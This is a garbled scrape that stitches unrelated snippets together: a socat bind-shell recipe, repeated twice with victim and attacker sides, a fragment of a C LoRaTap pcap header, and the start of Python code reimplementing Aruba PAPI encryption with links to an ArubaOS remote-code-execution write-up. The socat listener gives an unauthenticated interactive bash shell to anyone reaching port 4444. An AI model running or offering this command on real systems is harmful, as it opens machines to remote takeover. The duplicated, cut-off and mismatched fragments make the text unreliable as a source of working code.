socat bind shell
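Victim (listener side: hands an interactive bash login shell to any client that reaches TCP port 4444; no bind= address is given, so the port is open on every interface, and the command adds no authentication or encryption)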
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
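Attacker (client side: puts the local terminal in raw mode with echo off and connects to the listener; 127.0.0.1 is loopback, so this example stays on one machine)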
socat -,raw,echo=0 tcp:127.0.0.1:4444
#include "loratap.h" | |
#include <string.h> | |
#include <stdio.h> | |
#include <arpa/inet.h> | |
#define LINKTYPE_LORA_LORATAP 270 | |
typedef struct pcap_hdr_s { | |
uint32_t magic_number; /* magic number */ | |
uint16_t version_major; /* major version number */ |
socat bind shell
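Victim (listener side: hands an interactive bash login shell to any client that reaches TCP port 4444; no bind= address is given, so the port is open on every interface, and the command adds no authentication or encryption)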
socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp-listen:4444
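Attacker (client side: puts the local terminal in raw mode with echo off and connects to the listener; 127.0.0.1 is loopback, so this example stays on one machine)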
socat -,raw,echo=0 tcp:127.0.0.1:4444
import hashlib | |
from struct import * | |
""" | |
This implementation was reverse engineered using Wireshark (and source code), strace and two excellent articles:
- https://x-c3ll.github.io/posts/CVE-2018-7081-RCE-ArubaOS/
- https://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html
""" | |
def papi_encrypt(data): |